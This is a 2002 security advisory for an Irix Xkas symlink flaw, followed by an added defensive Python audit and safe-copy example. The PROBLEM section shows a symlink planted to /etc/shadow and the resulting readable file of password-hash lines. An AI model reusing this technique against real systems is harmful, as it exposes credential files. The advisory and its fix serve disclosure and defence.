Xkas symlink vulnerability
29th Jan 2002 [SBWID-5039]
COMMAND

	Xkas symlink vulnerability

SYSTEMS AFFECTED

	Irix 6.5

PROBLEM

	Kim Yong-Jun from HackersLab [http://www.hackerslab.org] says:

	Xkas is a server administration tool for AppleShare. Misconfiguration
	by the user with the root privilege could lead to a serious security
	vulnerability.

	The .HSResource directory and .HSicon file are created when sharing a
	directory. Creation of the .HSicon file is accomplished by copying the
	/var/adm/appletalk/icons/VOLICON file. A problem occurs during this
	process because the permission of the /var/adm/appletalk/icons directory
	is set to 777 (world-writable). Link the wanted file to VOLICON as in
	the following.

	$ ls -al /var/adm/appletalk/icons
	total 8
	drwxrwxrwx    4 root     sys           57 Jan 25 03:12 .
	drwxr-xr-x    6 root     sys         4096 Jan 24 16:05 ..
	drwxr-xr-x    2 root  sys           9 Jan 25 03:12 .HSResource
	lrwxr-xr-x    1 loveyou  user          11 Jan 25 03:05 VOLICON -> /etc/shadow

	When the administrator uses the /usr/etc/appletalk/xkas directory to
	share the root directory, the following files are created in the root.

	$ ls -al /
	total 17099
	drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 .
	drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 ..
	drwxr-xr-x    2 root     sys             9 Jan 25 03:30 .HSResource
	-rw-r--r--    1 root     sys           786 Jan 25 03:30 .HSicon
	(etc..)

	$ cat /.HSicon
	root:y7floveyous30I:10908::::::
	bin:yxaiFduxixe8s:11127::::::
	uucp:*:11127::::::
	sys:*:11127::::::
	adm:*:11127::::::
	loveyou:mXaa2jxi/ejY:10877::::::

SOLUTION

	Remove the other-write permission, then contact your vendor and get a patch.

	$ su -
	# chmod o-w /var/adm/appletalk/icons
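	As an added example (not part of the advisory or of SGI's code), the Python below shows the two defensive halves of this issue: an audit that flags a world-writable directory without the sticky bit and any symlink planted in it, and a copy routine that opens its source with O_NOFOLLOW so a planted link is never followed by a privileged copier. The layout in demo() is constructed in a temporary directory, with a stand-in file in place of /etc/shadow.

```python
"""Constructed defender-side checks for the VOLICON symlink issue above.
Not code from the advisory or from SGI: audit_dir() flags the writable
directory and any planted link; safe_copy() copies without following links."""
import os
import shutil
import stat
import tempfile

def audit_dir(path):
    """Return findings for a directory that root copies files out of."""
    findings = []
    mode = os.lstat(path).st_mode
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        findings.append(f"{path}: world-writable without sticky bit")
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if os.path.islink(full):          # any local user could have planted this
            findings.append(f"{full}: symlink -> {os.readlink(full)}")
    return findings

def safe_copy(src, dst):
    """Copy src to dst, refusing a symlink at src (OSError) or a non-regular file."""
    fd = os.open(src, os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0))
    st = os.fstat(fd)                     # inspect what was actually opened
    if not stat.S_ISREG(st.st_mode):
        os.close(fd)
        raise ValueError(f"{src} is not a regular file")
    with os.fdopen(fd, "rb") as fin, open(dst, "wb") as fout:
        shutil.copyfileobj(fin, fout)
    return st.st_size

def demo():
    """Rebuild the advisory's layout in a temp dir; every path here is constructed."""
    base = tempfile.mkdtemp()
    icons = os.path.join(base, "icons")
    os.mkdir(icons)
    os.chmod(icons, 0o777)                # the misconfiguration from the advisory
    secret = os.path.join(base, "shadow-stand-in")
    with open(secret, "w") as f:
        f.write("root:hash:10908::::::\n")
    os.symlink(secret, os.path.join(icons, "VOLICON"))
    findings = audit_dir(icons)
    try:
        safe_copy(os.path.join(icons, "VOLICON"), os.path.join(base, ".HSicon"))
        refused = False
    except OSError:                       # ELOOP: the link was not followed
        refused = True
    shutil.rmtree(base)
    return findings, refused
```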

	
